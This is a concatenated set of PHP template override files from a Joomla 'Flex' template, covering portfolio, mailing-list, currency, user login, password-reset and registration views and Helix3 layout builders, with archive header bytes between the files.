                    // Popup Image (default = "original image", square, rectangle, tower)
                    $popup_image = $params->get('popup_image', 'default');
                    if($popup_image == 'quare') {
                        $item->popup_img_url = JURI::base(true) . '/images/spsimpleportfolio/' . $item->alias . '/' . JFile::stripExt(JFile::getName($item->image)) . '_'. $square .'.' . JFile::getExt($item->image);
                    } else if($popup_image == 'rectangle') {
                        $item->popup_img_url = JURI::base(true) . '/images/spsimpleportfolio/' . $item->alias . '/' . JFile::stripExt(JFile::getName($item->image)) . '_'. $rectangle .'.' . JFile::getExt($item->image);
                    } else if($popup_image == 'tower') {
                        $item->popup_img_url = JURI::base(true) . '/images/spsimpleportfolio/' . $item->alias . '/' . JFile::stripExt(JFile::getName($item->image)) . '_'. $tower .'.' . JFile::getExt($item->image);
                    } else {
                        $item->popup_img_url = JURI::base() . $item->image;
                    } ?>
					<div class="sp-simpleportfolio-overlay">
						<div class="sp-vertical-middle">
							<div>
								<div class="sp-simpleportfolio-btns">
									<?php if($show_view_button!=0) { ?> 
                                         <?php if( $item->video ) { ?>
											 <?php if($show_zoom_button!=0) { ?>
                                                <a class="btn-zoom gallery-<?php echo $randomid; ?>" href="#" data-featherlight="#sp-simpleportfolio-video<?php echo $item->spsimpleportfolio_item_id; ?>"><?php echo JText::_('MOD_SPSIMPLEPORTFOLIO_WATCH'); ?></a>
                                                <a class="btn-view" href="<?php echo $item->url; ?>"><?php echo JText::_('MOD_SPSIMPLEPORTFOLIO_VIEW'); ?></a>
                                                <?php } else { ?>
                                             <a class="btn-view-only" href="<?php echo $item->url; ?>"><i class="fa fa-link"></i></a>
                                             <?php } ?>    
                                        <?php } else { ?>
                                          <?php if($show_zoom_button!=0) { ?>
                                            <a class="btn-zoom gallery-<?php echo $randomid; ?>" href="<?php echo $item->popup_img_url; ?>" data-featherlight="image"><?php echo JText::_('MOD_SPSIMPLEPORTFOLIO_ZOOM'); ?></a>
                                            <a class="btn-view" href="<?php echo $item->url; ?>"><?php echo JText::_('MOD_SPSIMPLEPORTFOLIO_VIEW'); ?></a>  
                                           <?php } else { ?>
                                        	<a class="btn-view-only" href="<?php echo $item->url; ?>"><i class="fa fa-link"></i></a> 
                                        <?php } ?> 
                                       <?php } ?> 
                                     <?php } else { ?>
                                      <?php if($show_zoom_button!=0) { ?>
                                        <?php if( $item->video ) { ?>
                                            <a class="btn-zoom-icon gallery-<?php echo $randomid; ?>" href="#" data-featherlight="#sp-simpleportfolio-video<?php echo $item->spsimpleportfolio_item_id; ?>"><i class="fa fa-search"></i></a>
                                        <?php } else { ?>
                                          <a class="btn-zoom-icon gallery-<?php echo $randomid; ?>" href="<?php echo $item->popup_img_url; ?>" data-featherlight="image"><i class="fa fa-search"></i></a>
                                        <?php } ?>
                                      <?php } ?>
                                    <?php } ?>
								</div>
								<?php if($layout_type!='default') { ?>
								<h3 class="sp-simpleportfolio-title">
									<a href="<?php echo $item->url; ?>">
										<?php echo $item->title; ?>
									</a>
								</h3>
									<?php if($show_tags!=0) { ?>
                                        <div class="sp-simpleportfolio-tags">
                                            [ <?php echo implode(', ', $newtags); ?> ]
                                        </div>
                                    <?php } ?>
								<?php } ?>
							</div>
						</div>
					</div>
				</div>
				<?php if($layout_type=='default') { ?>
					<div class="sp-simpleportfolio-info">
						<h3 class="sp-simpleportfolio-title">
							<a href="<?php echo $item->url; ?>">
								<?php echo $item->title; ?>
							</a>
						</h3>
                        <?php if($show_tags!=0) { ?>
                            <div class="sp-simpleportfolio-tags">
                                <?php echo (count($newtags) > 1) ? '<i class="fa fa-tags"></i>' : '<i class="fa fa-tag"></i>'; ?><?php echo implode(', ', $newtags); ?>
                            </div>
                        <?php } ?>
					</div>
				<?php } ?>
			</div>
			<?php
			$i++;
			if($i==11) {
				$i = 0;
			}
			?>
		<?php } ?>
	</div>
</div>
<script type="text/javascript">jQuery(document).ready(function(){jQuery('.sp-simpleportfolio-btns .gallery-<?php echo $randomid; ?>').featherlightGallery({previousIcon: '<i class="arrow-previous-thin"></i>',nextIcon: '<i class="arrow-next-thin"></i>'});});</script>
PK!��뒎� flex/html/mod_acym/tableless.phpnu&1i�<?php

use AcyMailing\Helpers\CaptchaHelper;

$listsContent = '';
if (!empty($visibleLists)) {
    $listsContent .= '<div class="acym_lists">';
    foreach ($visibleLists as $myListId) {
        $check = '';
        if (in_array($myListId, $checkedLists)) {
            $check = 'checked="checked"';
        }

        $listsContent .= '
            <div class="onelist">
            	<input type="checkbox" class="acym_checkbox" name="subscription[]" id="acylist_'.$myListId.'_'.$formName.'" '.$check.' value="'.$myListId.'"/>
                <label for="acylist_'.$myListId.'_'.$formName.'">'.$allLists[$myListId]->name.'</label>
            </div>';
    }
    $listsContent .= '</div>';
}
if ($listPosition == 'before') echo $listsContent;
?>
<div class="acym_form">
    <?php
    foreach ($fields as $field) {
        $fieldDB = empty($field->option->fieldDB) ? '' : json_decode($field->option->fieldDB);
        $field->value = empty($field->value) ? '' : json_decode($field->value);
        $field->option = json_decode($field->option);
        $valuesArray = [];
        if (!empty($field->value)) {
            foreach ($field->value as $value) {
                $valueTmp = new stdClass();
                $valueTmp->text = $value->title;
                $valueTmp->value = $value->value;
                if ($value->disabled == 'y') $valueTmp->disable = true;
                $valuesArray[$value->value] = $valueTmp;
            }
        }
        if (!empty($fieldDB) && !empty($fieldDB->value)) {
            $fromDB = $fieldClass->getValueFromDB($fieldDB);
            foreach ($fromDB as $value) {
                $valuesArray[$value->value] = $value->title;
            }
        }
        $size = empty($field->option->size) ? '' : 'width:'.$field->option->size.'px';
        echo '<div class="onefield fieldacy'.$field->id.' acyfield_'.$field->type.'" id="field_'.$field->id.'">';
        echo $fieldClass->displayField($field, $field->default_value, $size, $valuesArray, $displayOutside, true, $identifiedUser);
        echo '</div>';
    }

    if ($listPosition != 'before') echo $listsContent;

    if (empty($identifiedUser->id) && $config->get('captcha', '') == 1) {
        echo '<div class="onefield fieldacycaptcha" id="field_captcha_'.$formName.'">';
        $captcha = new CaptchaHelper();
        echo $captcha->display($formName, $params->get('includejs') == 'module');
        echo '</div>';
    }

    if (!empty($termslink)) {
        echo '<div class="onefield fieldacyterms" id="field_terms_'.$formName.'">';
        echo '<label for="mailingdata_terms_'.$formName.'">';
        echo '<input id="mailingdata_terms_'.$formName.'" class="checkbox" type="checkbox" name="terms" title="'.acym_translation('ACYM_TERMS_CONDITIONS').'"/> '.$termslink;
        echo '</label>';
        echo '</div>';
    }
    ?>
</div>
<?php if ($params->get('subtext') != '') { ?>
<span class="acysubbuttons">
<?php } else { ?>
<span class="acysubbuttons-icon">
<?php } ?>
<noscript>
	<div class="onefield fieldacycaptcha">
        <?php echo acym_translation('ACYM_NO_JAVASCRIPT'); ?>
	</div>
</noscript>
<?php if ($params->get('subtext') != '') { ?>
<input type="button" class="btn btn-primary subbutton" value="<?php echo acym_translation($subscribeText, true); ?>" name="Submit" onclick="try{ return submitAcymForm('subscribe','<?php echo $formName; ?>', 'acySubmitSubForm'); }catch(err){alert('The form could not be submitted '+err);return false;}" />
<?php } else { ?>
<input type="button" class="icon_button_subscribe" value="<?php echo acym_translation($subscribeText, true); ?>" name="Submit" onclick="try{ return submitAcymForm('subscribe','<?php echo $formName; ?>', 'acymSubmitSubForm'); }catch(err){alert('The form could not be submitted '+err);return false;}" />
<?php } ?>
<?php if ($params->get('unsub', '0') == '1' && !empty($countUnsub)) { ?>
	<span style="display:none;"></span>
	<input type="button" class="btn button unsubbutton" value="<?php echo acym_translation($unsubscribeText, true); ?>" name="Submit" onclick="try{ return submitAcymForm('unsubscribe','<?php echo $formName; ?>', 'acymSubmitSubForm'); }catch(err){alert('The form could not be submitted '+err);return false;}" />
<?php } ?>
</span>PK!��/flex/html/mod_virtuemart_currencies/default.phpnu&1i�<?php // no direct access
defined('_JEXEC') or die('Restricted access');
//vmJsApi::jQuery();
//vmJsApi::chosenDropDowns();
JHtml::_('formbehavior.chosen', 'select');
$currentLanguage = JFactory::getLanguage();
$currentLanguageName = $currentLanguage->getName();
$isRTL = $currentLanguage->isRtl();
// Check of current language is RTL
if($isRTL) {
	$class = 'inputbox';
} else {
	$class = 'inputbox vm-chzn-select';
}
?>
<div class="currency-selector-module">
<!-- Currency Selector Module -->
<?php if ($text_before != '') { ?><p><?php echo $text_before ?></p><?php } ?>
<form action="<?php echo vmURI::getCleanUrl() ?>" method="post">
    <button class="btn btn-default" type="submit" name="submit" data-toggle="tooltip" title="<?php echo vmText::_('MOD_VIRTUEMART_CURRENCIES_CHANGE_CURRENCIES') ?>"><i class="fa fa-refresh"></i></button>
    <?php echo JHTML::_('select.genericlist', $currencies, 'virtuemart_currency_id', 'class="'.$class.'"', 'virtuemart_currency_id', 'currency_txt', $virtuemart_currency_id) ; ?>
</form>
</div>

PK!ꪐd~~&flex/html/com_users/reset/complete.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_users
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');
?>
<div class="row">
	<div class="col-sm-4 col-sm-offset-4">
		<div class="reset-complete<?php echo $this->pageclass_sfx?>">
			<?php if ($this->params->get('show_page_heading')) : ?>
				<h1>
					<?php echo $this->escape($this->params->get('page_heading')); ?>
				</h1>
			<?php endif; ?>

			<form action="<?php echo JRoute::_('index.php?option=com_users&task=reset.complete'); ?>" method="post" class="form-validate">
				<?php foreach ($this->form->getFieldsets() as $fieldset) : ?>
					<?php foreach ($this->form->getFieldset($fieldset->name) as $name => $field) : ?>
						<p><?php echo JText::_($fieldset->label); ?></p>
						<div class="form-group">
							<?php echo $field->label; ?>
							<div class="group-control">
								<?php echo $field->input; ?>
							</div>
						</div>
					<?php endforeach; ?>
				<?php endforeach; ?>

				<div class="form-group">
					<button type="submit" class="btn btn-primary validate"><?php echo JText::_('JSUBMIT'); ?></button>
				</div>
				<?php echo JHtml::_('form.token'); ?>
			</form>
		</div>
	</div>
</div>
PK!�\���%flex/html/com_users/reset/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_users
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');
?>
<div class="row reset-wrapper">
	<i class="pe pe-7s-key hidden-xs"></i>
	<div class="col-sm-6 col-sm-offset-3">
		<div class="reset<?php echo $this->pageclass_sfx?>">
			<?php if ($this->params->get('show_page_heading')) : ?>
				<h1>
					<?php echo $this->escape($this->params->get('page_heading')); ?>
				</h1>
			<?php endif; ?>

			<form id="user-registration" action="<?php echo JRoute::_('index.php?option=com_users&task=reset.request'); ?>" method="post" class="form-validate">
				<?php foreach ($this->form->getFieldsets() as $fieldset) : ?>
					<p><?php echo JText::_($fieldset->label); ?></p>
					<?php foreach ($this->form->getFieldset($fieldset->name) as $name => $field) : ?>
						<div class="form-group">
							<?php echo $field->label; ?>
							<div class="group-control">
								<?php echo $field->input; ?>
							</div>
						</div>
					<?php endforeach; ?>
				<?php endforeach; ?>

				<div class="form-group">
					<button type="submit" class="btn btn-primary validate"><?php echo JText::_('JSUBMIT'); ?></button>
				</div>
				<?php echo JHtml::_('form.token'); ?>
			</form>
		</div>
	</div>
</div>
PK!z�Ӏ�%flex/html/com_users/reset/confirm.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_users
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');
?>
<div class="row">
	<div class="col-sm-4 col-sm-offset-4">
		<div class="reset-confirm<?php echo $this->pageclass_sfx?>">
			
			<?php if ($this->params->get('show_page_heading')) : ?>
				<h1>
					<?php echo $this->escape($this->params->get('page_heading')); ?>
				</h1>
			<?php endif; ?>

			<form action="<?php echo JRoute::_('index.php?option=com_users&task=reset.confirm'); ?>" method="post" class="form-validate">
				<?php foreach ($this->form->getFieldsets() as $fieldset) : ?>
					<p><?php echo JText::_($fieldset->label); ?></p>
					<?php foreach ($this->form->getFieldset($fieldset->name) as $name => $field) : ?>
						<div class="form-group">
							<?php echo $field->label; ?>
							<div class="group-control">
								<?php echo $field->input; ?>
							</div>
						</div>
					<?php endforeach; ?>
				<?php endforeach; ?>

				<div class="form-group">
					<button type="submit" class="btn btn-primary validate"><?php echo JText::_('JSUBMIT'); ?></button>
				</div>
				<?php echo JHtml::_('form.token'); ?>
			</form>

		</div>
	</div>
</div>
PK!��1��+flex/html/com_users/login/default_login.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;
$input = JFactory::getApplication()->input;
$return = $input->get('return', base64_encode($this->form->getValue('return')), 'STRING');

JHtml::_('behavior.keepalive');
?>
<div class="row login-wrapper">
  <i class="pe pe-7s-key hidden-xs"></i>
	<div class="col-sm-6 col-sm-offset-3">
		<div class="login<?php echo $this->pageclass_sfx?>">
			<?php if ($this->params->get('show_page_heading')) : ?>
				<h2 class="title"><i class="pe pe-7s-user"></i>
					<?php echo $this->escape($this->params->get('page_heading')); ?>
				</h2>
			<?php endif; ?>

			<?php if (($this->params->get('logindescription_show') == 1 && str_replace(' ', '', $this->params->get('login_description')) != '') || $this->params->get('login_image') != '') : ?>
			<div class="login-description">
			<?php endif; ?>

				<?php if ($this->params->get('logindescription_show') == 1) : ?>
					<?php echo $this->params->get('login_description'); ?>
				<?php endif; ?>

				<?php if (($this->params->get('login_image') != '')) :?>
					<img src="<?php echo $this->escape($this->params->get('login_image')); ?>" class="login-image" alt="<?php echo JTEXT::_('COM_USERS_LOGIN_IMAGE_ALT')?>"/>
				<?php endif; ?>

			<?php if (($this->params->get('logindescription_show') == 1 && str_replace(' ', '', $this->params->get('login_description')) != '') || $this->params->get('login_image') != '') : ?>
			</div>
			<?php endif; ?>

			<form action="<?php echo JRoute::_('index.php?option=com_users&task=user.login'); ?>" method="post" class="form-validate">

				<?php /* Set placeholder for username, password and secretekey */
					$this->form->setFieldAttribute( 'username', 'hint', JText::_('COM_USERS_LOGIN_USERNAME_LABEL') );
					$this->form->setFieldAttribute( 'password', 'hint', JText::_('JGLOBAL_PASSWORD') );
					$this->form->setFieldAttribute( 'secretkey', 'hint', JText::_('JGLOBAL_SECRETKEY') );
				?>

				<?php foreach ($this->form->getFieldset('credentials') as $field) : ?>
					<?php if (!$field->hidden) : ?>
						<div class="form-group">
							<div class="group-control">
								<?php echo $field->input; ?>
							</div>
						</div>
					<?php endif; ?>
				<?php endforeach; ?>

				<?php if ($this->tfa): ?>
					<div class="form-group">
						<div class="group-control">
							<?php echo $this->form->getField('secretkey')->input; ?>
						</div>
					</div>
				<?php endif; ?>

				<?php if (JPluginHelper::isEnabled('system', 'remember')) : ?>
					<div class="checkbox">
						<input id="remember" type="checkbox" name="remember" class="inputbox" value="yes" />
						<label for="remember"><?php echo JText::_('COM_USERS_LOGIN_REMEMBER_ME') ?></label>
					</div>
				<?php endif; ?>

				<div class="form-group">
					<button style="margin:10px 0;" type="submit" class="btn btn-primary">
						<?php echo JText::_('JLOGIN'); ?>
					</button>

					<div class="form-links">	
						<?php echo JText::_('MOD_LOGIN_FORGOT'); ?> <a href="<?php echo JRoute::_('index.php?option=com_users&view=remind'); ?>">
						<?php echo JText::_('MOD_LOGIN_FORGOT_USERNAME'); ?></a> <?php echo jText::_('MOD_LOGIN_OR'); ?> <a href="<?php echo JRoute::_('index.php?option=com_users&view=reset'); ?>">
						<?php echo JText::_('MOD_LOGIN_FORGOT_PASSWORD'); ?></a> <?php echo JText::_('FLEX_QUESTION_MARK'); ?>
					</div>
				</div>
                
                <?php $return = $this->form->getValue('return', '', $this->params->get('login_redirect_url', $this->params->get('login_redirect_menuitem'))); ?>
 				<input type="hidden" name="return" value="<?php echo base64_encode($return); ?>" />
				<?php echo JHtml::_('form.token'); ?>

			</form>

			<?php
			$usersConfig = JComponentHelper::getParams('com_users');
			if ($usersConfig->get('allowUserRegistration')) { ?>
			<div class="form-footer">
				<?php echo JText::_('MOD_NEW_REGISTER'); ?>
				<a href="<?php echo JRoute::_('index.php?option=com_users&view=registration'); ?>">
					<?php echo JText::_('MOD_LOGIN_CREATE_ACCOUNT'); ?>
				</a>
			</div>
			<?php } ?>

		</div>
	</div>
</div>
PK!d$Z**%flex/html/com_users/login/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_users
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$cookieLogin = $this->user->get('cookieLogin');

if ($this->user->get('guest') || !empty($cookieLogin))
{
	// The user is not logged in or needs to provide a password.
	echo $this->loadTemplate('login');
}
else
{
	// The user is already logged in.
	echo $this->loadTemplate('logout');
}
PK!�	���,flex/html/com_users/login/default_logout.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;
?>
<div class="row">
	<div class="col-sm-4 col-sm-offset-4">
		<div class="logout<?php echo $this->pageclass_sfx?>">
			<?php if ($this->params->get('show_page_heading')) : ?>
				<h2>
					<?php echo $this->escape($this->params->get('page_heading')); ?>
				</h2>
                <hr />
			<?php endif; ?>

			<?php if (($this->params->get('logoutdescription_show') == 1 && str_replace(' ', '', $this->params->get('logout_description')) != '')|| $this->params->get('logout_image') != '') : ?>
			<div class="logout-description">
			<?php endif; ?>

				<?php if ($this->params->get('logoutdescription_show') == 1) : ?>
					<p><?php echo $this->params->get('logout_description'); ?></p>
				<?php endif; ?>

				<?php if (($this->params->get('logout_image') != '')) :?>
					<p><img src="<?php echo $this->escape($this->params->get('logout_image')); ?>" class="logout-image" alt="<?php echo JTEXT::_('COM_USER_LOGOUT_IMAGE_ALT')?>"/></p>
				<?php endif; ?>

			<?php if (($this->params->get('logoutdescription_show') == 1 && str_replace(' ', '', $this->params->get('logout_description')) != '')|| $this->params->get('logout_image') != '') : ?>
			</div>
			<?php endif; ?>

			<form action="<?php echo JRoute::_('index.php?option=com_users&task=user.logout'); ?>" method="post">
				<div class="form-group">
					<button type="submit" class="btn btn-primary"><i style="margin-left:-3px;margin-right:9px;" class="fas fa-unlock-alt"></i><?php echo JText::_('JLOGOUT'); ?></button>
				</div>
				<?php if ($this->params->get('logout_redirect_url')) : ?>
					<input type="hidden" name="return" value="<?php echo base64_encode($this->params->get('logout_redirect_url', $this->form->getValue('return'))); ?>" />
				<?php else : ?>
					<input type="hidden" name="return" value="<?php echo base64_encode($this->params->get('logout_redirect_menuitem', $this->form->getValue('return'))); ?>" />
				<?php endif; ?>
				<?php echo JHtml::_('form.token'); ?>
			</form>
		</div>
	</div>
</div>
PK!�c���&flex/html/com_users/remind/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_users
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');
?>
<div class="row remind-wrapper">
	<i class="pe pe-7s-mail-open-file hidden-xs"></i>
	  <div class="col-sm-6 col-sm-offset-3">
		<div class="remind<?php echo $this->pageclass_sfx?>">
			<?php if ($this->params->get('show_page_heading')) : ?>
				<h1>
					<?php echo $this->escape($this->params->get('page_heading')); ?>
				</h1>
			<?php endif; ?>

			<form id="user-registration" action="<?php echo JRoute::_('index.php?option=com_users&task=remind.remind'); ?>" method="post" class="form-validate">
				<?php foreach ($this->form->getFieldsets() as $fieldset) : ?>
				<p><?php echo JText::_($fieldset->label); ?></p>
				<?php foreach ($this->form->getFieldset($fieldset->name) as $name => $field) : ?>
					<div class="form-group">
						<?php echo $field->label; ?>
						<div class="group-control">
							<?php echo $field->input; ?>
						</div>
					</div>
				<?php endforeach; ?>
				<?php endforeach; ?>
				<div class="form-group">
					<button type="submit" class="btn btn-primary validate"><?php echo JText::_('JSUBMIT'); ?></button>
				</div>
				<?php echo JHtml::_('form.token'); ?>
			</form>
		</div>
	</div>
</div>
PK!��{��-flex/html/com_users/registration/complete.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_users
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>
<div class="registration-complete<?php echo $this->pageclass_sfx;?>">
	<?php if ($this->params->get('show_page_heading')) : ?>
	<h1>
		<?php echo $this->escape($this->params->get('page_heading')); ?>
	</h1>
	<?php endif; ?>
</div>
PK!�
w�	�	,flex/html/com_users/registration/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_users
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');
?>
<div class="row-fluid registration-wrapper">
<i class="pe pe-7s-users hidden-xs"></i>
	<div class="col-sm-6 col-sm-offset-3">
		<div class="registration<?php echo $this->pageclass_sfx?>">
			<?php if ($this->params->get('show_page_heading')) : ?>
				<h1><?php echo $this->escape($this->params->get('page_heading')); ?></h1>
			<?php endif; ?>
            <form id="member-registration" action="<?php echo JRoute::_('index.php?option=com_users&task=registration.register'); ?>" method="post" class="form-validate" enctype="multipart/form-data">
			<?php // Iterate through the form fieldsets and display each one. ?>
            <?php foreach ($this->form->getFieldsets() as $fieldset) : ?>
                <?php $fields = $this->form->getFieldset($fieldset->name); ?>
                <?php if (count($fields)) : ?>
                <fieldset class="clearfix">
                    <?php // If the fieldset has a label set, display it as the legend. ?>
                    <?php if (isset($fieldset->label)) : ?>
                        <div class="spacer clearfix"><legend><?php echo JText::_($fieldset->label); ?></legend></div>
                    <?php endif; ?>
                    <div class="form-group">
                        <div class="group-control">
                        <?php echo $this->form->renderFieldset($fieldset->name); ?>
                        </div>
                    </div>  
                </fieldset>    
                <?php endif; ?>
            <?php endforeach; ?>
            <div class="form-group clearfix">
                <button type="submit" class="btn btn-success validate">
                    <?php echo JText::_('JREGISTER'); ?>
                </button>
                <a class="btn btn-danger" href="<?php echo JRoute::_(''); ?>" title="<?php echo JText::_('JCANCEL'); ?>">
                    <?php echo JText::_('JCANCEL'); ?>
                </a>
                <input type="hidden" name="option" value="com_users" />
                <input type="hidden" name="task" value="registration.register" />
            </div>
            <?php echo JHtml::_('form.token'); ?>
        </form>
		</div>
	</div>
</div>
PK!����.flex/html/layouts/helix3/frontend/generate.phpnu&1i�<?php
/**
 * @package     Helix
 * @copyright   Copyright (C) 2010 - 2018 JoomShaper. All rights reserved.
 * @license     GNU General Public License version 2 or later.
 */
defined('_JEXEC') or die('Restricted Access');

//

//helper & model
$menu_class   = JPATH_ROOT . '/plugins/system/helix3/core/classes/helix3.php';

if (file_exists($menu_class)) {
    require_once($menu_class);
}

$template       = JFactory::getApplication()->getTemplate();
$themepath      = JPATH_THEMES . '/' . $template;
$rows_file      = $themepath . '/html/layouts/helix3/frontend/rows.php';
$lyt_thm_path   = $themepath . '/html/layouts/helix3/';

$this->helix3 = helix3::getInstance();

$layout_path  = (file_exists($rows_file)) ? $lyt_thm_path : JPATH_ROOT .'/plugins/system/helix3/layouts';

$data = $displayData;

$output ='';

$output .= '<' . $data['sematic'] . ' id="' . $data['id'] . '"' . $data['row_class'] . '>';


if ($data['componentArea']){
    if (!$data['pagebuilder']){
        if (!$data['fluidrow']){
			$output .= '<div class="container">';
		} 
		else {
			$output .= '<div class="container-fluid">';
		}
    } else {
		if (!$data['fluidrow']){
			if ($this->helix3->countModules('left') || $this->helix3->countModules('right')) {
				// When SPPB is inside Article with "left" or "right" modules
				$output .= '<div class="container has-left-right-modules">';
			}
		} 
		else {
			if ($this->helix3->countModules('left') || $this->helix3->countModules('right')) {
				// When SPPB is inside Article with "left" or "right" modules
				$output .= '<div class="container-fluid has-left-right-modules">';
			}
		}
	}
}
else{
    if (!$data['fluidrow']){
        $output .= '<div class="container">';
    } 
}


$getLayout = new JLayoutFile('frontend.rows', $layout_path );

$output .= $getLayout->render($data);


if ($data['componentArea']){
    if (!$data['pagebuilder']){
		if (!$data['fluidrow']){
			$output .= '</div>';
		} else {
			$output .= '</div>';
		}
	} else if ($this->helix3->countModules('left') || $this->helix3->countModules('right')) {
		// When SPPB is inside Article with "left" or "right" modules
		$output .= '</div>';	
	}
}

else{
    if (!$data['fluidrow']){
        $output .= '</div>';
    }
}

$output .= '</' . $data['sematic'] . '>';


echo $output;

PK!�gk�0	0	-flex/html/layouts/helix3/frontend/modules.phpnu&1i�<?php
/**
* @package Helix3 Framework
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2018 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or Later
*/
defined('_JEXEC') or die('Restricted Access');

//helper & model
$menu_class   = JPATH_ROOT . '/plugins/system/helix3/core/classes/helix3.php';
$this->helix3 = helix3::getInstance();

if (file_exists($menu_class)) {
    require_once($menu_class);
}

$data = $displayData;

$left_right_modules = '';
$custom_class = (isset($data->settings->custom_class) && $data->settings->custom_class) ? ' ' . $data->settings->custom_class : '';

if (JFilterOutput::stringURLSafe($data->settings->name) == 'left' || JFilterOutput::stringURLSafe($data->settings->name) == 'right') {
	// When SPPB is inside Article with "left" modules
	$left_right_modules = ' sppb-in-article';
} 

$output ='';

    $output .= '<div id="sp-' . JFilterOutput::stringURLSafe($data->settings->name) . '" class="' . $data->className . $left_right_modules . '">';

        $output .= '<div class="sp-column' . $custom_class . '">';

        $features = (Helix3::hasFeature($data->settings->name))? helix3::getInstance()->loadFeature[$data->settings->name] : array();

            foreach ($features as $key => $feature){
                if (isset($feature['feature']) && $feature['load_pos'] == 'before' ) {
                    $output .= $feature['feature'];
                }
            }

            if (JFilterOutput::stringURLSafe($data->settings->name) == 'left' || JFilterOutput::stringURLSafe($data->settings->name) == 'right') {
			// Only "left" or "right" module positions
			$output .= '<div class="sp-lr">';
			} 
			
            $output .= '<jdoc:include type="modules" name="' . $data->settings->name . '" style="sp_xhtml" />';
			
			if (JFilterOutput::stringURLSafe($data->settings->name) == 'left' || JFilterOutput::stringURLSafe($data->settings->name) == 'right') {
			// Only "left" or "right" module positions
			$output .= '</div>';
			} 

            foreach ($features as $key => $feature){
                if (isset($feature['feature']) && $feature['load_pos'] != 'before' ) {
                    $output .= $feature['feature'];
                }
            }

        $output .= '</div>'; //.sp-column

    $output .= '</div>'; //.sp-


echo $output;
PK!�u�+��3flex/html/layouts/helix3/frontend/componentarea.phpnu&1i�<?php
/**
 * @package     Helix
 *
 * @copyright   Copyright (C) 2010 - 2018 JoomShaper. All rights reserved.
 * @license     GNU General Public License version 2 or later.
 */
defined('_JEXEC') or die('Restricted Access');

$this->helix3 = helix3::getInstance();

$data = $displayData;

$output ='';


$output .= '<div id="sp-component" class="' . $data->className . '">';

$output .= '<div class="sp-column ' . ($data->settings->custom_class) . '">';
$output .= '<jdoc:include type="message" />';

if ($this->helix3->countModules('above-component')) {
$output .= '<div class="above-component"><jdoc:include type="modules" name="above-component" /></div>';
}
$output .= '<jdoc:include type="component" />';
if ($this->helix3->countModules('below-component')) {
$output .= '<div class="below-component"><jdoc:include type="modules" name="below-component" /></div>';
}
$output .= '</div>';

$output .= '</div>';


echo $output;

PK!|f�		*flex/html/layouts/helix3/frontend/rows.phpnu&1i�<?php
/**
 * @package     Helix
 *
 * @copyright   Copyright (C) 2010 - 2016 JoomShaper. All rights reserved.
 * @license     GNU General Public License version 2 or later.
 */
defined('_JEXEC') or die('Restricted Access');

//helper & model
$menu_class   = JPATH_ROOT . '/plugins/system/helix3/core/classes/helix3.php';

if (file_exists($menu_class)) {
    require_once($menu_class);
}

$template       = JFactory::getApplication()->getTemplate();
$themepath      = JPATH_THEMES . '/' . $template;
$carea_file     = $themepath . '/html/layouts/helix3/frontend/componentarea.php';
$module_file    = $themepath . '/html/layouts/helix3/frontend/modules.php';
$lyt_thm_path   = $themepath . '/html/layouts/helix3/';

$layout_path_carea  = (file_exists($carea_file)) ? $lyt_thm_path : JPATH_ROOT .'/plugins/system/helix3/layouts';
$layout_path_module = (file_exists($module_file)) ? $lyt_thm_path : JPATH_ROOT .'/plugins/system/helix3/layouts';

$data = $displayData;

$output ='';

$output .= '<div class="row">';

foreach ($data['rowColumns'] as $key => $column){

    //Responsive Utilities
    if (isset($column->settings->xs_col) && $column->settings->xs_col) {
        $column->className = $column->settings->xs_col . ' ' . $column->className;
    }

    if (isset($column->settings->sm_col) && $column->settings->sm_col) {
        $column->className = preg_replace('/col-sm-\d*/', $column->settings->sm_col, $column->className);
    }

    if (isset($column->settings->hidden_md) && $column->settings->hidden_md) {
        $column->className = $column->className . ' hidden-md hidden-lg';
    }

    if (isset($column->settings->hidden_sm) && $column->settings->hidden_sm) {
        $column->className = $column->className . ' hidden-sm';
    }

    if (isset($column->settings->hidden_xs) && $column->settings->hidden_xs) {
